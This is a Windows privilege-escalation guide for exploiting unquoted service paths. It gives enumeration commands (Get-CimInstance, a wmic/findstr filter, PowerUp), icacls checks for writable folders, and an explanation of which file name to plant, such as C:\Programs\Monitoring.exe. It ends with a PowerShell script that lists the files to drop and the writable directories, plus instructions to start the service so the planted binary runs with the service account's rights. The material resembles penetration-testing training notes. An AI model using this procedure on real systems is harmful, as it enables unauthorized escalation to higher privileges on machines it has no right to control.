
Unquoted Service Paths


Finding services

Checking running and stopped services

| The service does not need to be running: a stopped service is still usable if you have the right to start it, and an auto-start service will run whatever binary it resolves to at the next boot. Either way you can leverage it for privilege escalation.

Get-CimInstance -ClassName win32_service | Select Name,State,StartMode,PathName

Unquoted service using cmd (keeps auto-start services, drops anything under C:\Windows\ and anything whose path is already quoted)

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Unquoted service using PowerUp (dot-source the script so its functions are loaded into the current session)

. .\PowerUp.ps1
Get-UnquotedService

Checking Access Rights on the folders

| Once you identify a service, confirm which directory along its path you can write to; that is where the malicious file goes.

Checking rights on the first folder in the path

icacls "C:\"

Checking rights on each following folder in the path

icacls "C:\Programs\"
icacls "C:\Programs\Monitoring Game"
icacls "C:\Programs\Monitoring Game\system\game.exe"

What we are looking for is an entry such as BUILTIN\Users:(OI)(CI)(RX,W) on one of the directories, where W means write access for a group the current user belongs to. M (modify) or F (full control) for BUILTIN\Users, Everyone or NT AUTHORITY\Authenticated Users is just as good. The rights on the final .exe itself are not what matters here; it is the directory that needs to be writable.

Windows resolves an unquoted path by splitting it at each space and trying every prefix with .exe appended before it reaches the real binary. For C:\Programs\Monitoring Game\system\game.exe it tries C:\Programs\Monitoring.exe first, then the full path. So the file to plant is named after the path component that ends at the first space following the writable directory: with write access to C:\Programs\, create C:\Programs\Monitoring.exe. Write access to C:\Programs\Monitoring Game does not help for this particular path, because the remainder system\game.exe contains no space, so Windows never looks for a system.exe there.

Once your file is in place, start the service (sc start <service name> or Start-Service <service name>); the planted binary then runs with the privileges of the service account.
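The whole procedure above, as an added example script that is not part of the original page or of PowerUp: it lists auto-start services whose image path is unquoted and contains a space, computes the binary names Windows would try before the real one (the CreateProcess split-at-each-space behaviour), and reports which of those parent directories the current user can write to. The Get-UnquotedPathCandidates and Test-WritableDirectory function names are mine; the assumption that the service binary ends in .exe (used to strip arguments from the path) is also mine. It only creates and deletes a zero-byte probe file; it does not plant anything.

```powershell
# Added example, not the page's or PowerUp's own code.
# Run as the low-privileged user whose access you want to test.

function Get-UnquotedPathCandidates {
    # Returns the executables Windows would try, in order, before the real one.
    param([Parameter(Mandatory)][string]$PathName)

    # Assumption: the binary ends in .exe; everything after it is arguments.
    $exeIdx = $PathName.ToLower().IndexOf('.exe')
    $binary = if ($exeIdx -ge 0) { $PathName.Substring(0, $exeIdx + 4) } else { $PathName }

    $candidates = @()
    $pos = $binary.IndexOf(' ')
    while ($pos -ge 0) {
        # e.g. "C:\Programs\Monitoring Game\system\game.exe" -> "C:\Programs\Monitoring.exe"
        $candidates += $binary.Substring(0, $pos) + '.exe'
        $pos = $binary.IndexOf(' ', $pos + 1)
    }
    return $candidates
}

function Test-WritableDirectory {
    # True if the current user can create a file in $Directory (probe file is removed).
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ([System.IO.Path]::GetRandomFileName())
    try {
        New-Item -ItemType File -Path $probe -ErrorAction Stop | Out-Null
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

# Same filter as the wmic one-liner: auto-start, not quoted, has a space, not under C:\Windows\.
$services = Get-CimInstance -ClassName Win32_Service | Where-Object {
    $_.PathName -and
    $_.StartMode -eq 'Auto' -and
    $_.PathName -notmatch '^\s*"' -and
    $_.PathName -match ' ' -and
    $_.PathName -notmatch '^\s*[A-Za-z]:\\Windows\\'
}

foreach ($svc in $services) {
    foreach ($cand in Get-UnquotedPathCandidates -PathName $svc.PathName) {
        $dir = Split-Path -Path $cand -Parent
        [pscustomobject]@{
            Service   = $svc.Name
            State     = $svc.State
            StartName = $svc.StartName
            PlantAs   = $cand
            Writable  = Test-WritableDirectory -Directory $dir
        }
    }
}
```

A row with Writable = True tells you exactly which file name to drop (PlantAs) and whom it will run as (StartName). It does not tell you whether you may start the service; a stopped one still has to be started by you or by a reboot, so try Start-Service on it (or wait for the next boot) after the file is in place.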